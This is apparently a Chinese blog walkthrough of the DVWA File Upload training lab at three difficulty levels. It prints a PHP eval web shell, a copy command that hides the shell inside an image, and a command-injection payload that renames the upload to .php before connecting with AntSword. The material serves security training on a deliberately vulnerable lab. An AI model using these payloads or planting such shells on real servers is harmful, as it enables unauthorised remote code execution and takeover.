【dvwa靶场:File Upload系列】File Upload低-中-高级别,通关啦

目录

一、low级别,直接上传木马文件

1.1、准备一个木马文件

1.2、直接上传木马文件

1.3、访问木马链接

1.4、连接蚁剑

二、medium级别:抓包文件缀名

2.1、准备一个木马文件,修改后缀名为图片的后缀名

2.2、上传文件,打开burpSuite,抓上传的包,修改后缀名为php,放行

2.3、访问木马文件链接

2.4、连接蚁剑

三、high级别:木马图片,命令执行修改为木马文件

3.1、准备一个真实小图片,命名自定义,以下是示例

3.2、准备一个木马文件

3.3、生成木马图片:cmd进入图片文件夹所在路径,执行生成木马图片命令

[3.4、上传文件 ,成功后复制路径](#3.4、上传文件 ,成功后复制路径)

[3.5、在Command Injection板块命令执行:修改木马图片为可行性木马文件](#3.5、在Command Injection板块命令执行:修改木马图片为可行性木马文件)

​3.6、访问修改后的,就是修改后的路径:你的dvwa路径拼接上这个文件路径,回车就自动成功那个路径

3.7、蚁剑连接:木马链接和木马密码


一、low级别,直接上传木马文件

1.1、准备一个木马文件

1.2、直接上传木马文件

1.3、访问木马链接

1.4、连接蚁剑

二、medium级别:抓包文件缀名

2.1、准备一个木马文件,修改后缀名为图片的后缀名

2.2、上传文件,打开burpSuite,抓上传的包,修改后缀名为php,放行

2.3、访问木马文件链接

2.4、连接蚁剑

三、high级别:木马图片,命令执行修改为木马文件

3.1、准备一个真实小图片,命名自定义,以下是示例

3.2、准备一个木马文件

复制代码
<?php @eval($_POST['pass']);?>

3.3、生成木马图片:cmd进入图片文件夹所在路径,执行生成木马图片命令

复制代码
copy 真实图片.后缀名/b+木马文件.后缀名 木马图片.真实图片后缀名

3.4、上传文件 ,成功后复制路径

3.5、在Command Injection板块命令执行:修改木马图片为可行性木马文件

复制代码
127.0.0.1|move ../../hackable/uploads/你的木马图片 ../../hackable/uploads/修改后的木马文件

例如我的:127.0.0.1|move ../../hackable/uploads/mua.jpg ../../hackable/uploads/mua.php

3.6、访问修改后的,就是修改后的路径:你的dvwa路径拼接上这个文件路径,回车就自动成功那个路径

http://127.0.0.1/dvwa/vulnerabilities/exec/../../hackable/uploads/mua.php直接回车,变成下方的木马文件链接

http://127.0.0.1/dvwa/hackable/uploads/mua.php

3.7、蚁剑连接:木马链接和木马密码

相关推荐
f0rev3r1 天前
NewStarCTF2025-WEEK2
网络安全
缘友一世1 天前
深入理解Shell与反弹Shell:从原理到实战
linux·网络安全·shell
Whoami!1 天前
⸢ 捌-Ⅰ⸥⤳ 可信纵深防御应用实践:0Day漏洞 & 钓鱼攻击
网络安全·信息安全·纵深防御·案例实践
white-persist1 天前
CSRF 漏洞全解析:从原理到实战
网络·python·安全·web安全·网络安全·系统安全·csrf
北京耐用通信1 天前
电力自动化新突破:Modbus如何变身Profinet?智能仪表连接的终极解决方案
人工智能·物联网·网络安全·自动化·信息与通信
汤愈韬1 天前
NTFS权限基础、权限累加规则、权限继承规则
windows·网络安全
lingggggaaaa1 天前
小迪安全v2023学习笔记(一百三十四讲)—— Windows权限提升篇&数据库篇&MySQL&MSSQL&Oracle&自动化项目
java·数据库·windows·笔记·学习·安全·网络安全
Bruce_Liuxiaowei2 天前
Win7虚拟机加入域错误排查指南:解决无法启动服务问题
运维·网络·windows·安全·网络安全
mjhcsp2 天前
博客安全攻防演练:从实战视角构建全方位防护体系
网络安全·博客
2401_865382502 天前
工信部发布→《云计算综合标准化体系建设指南(2025版)》
网络安全·云计算·信息安全技术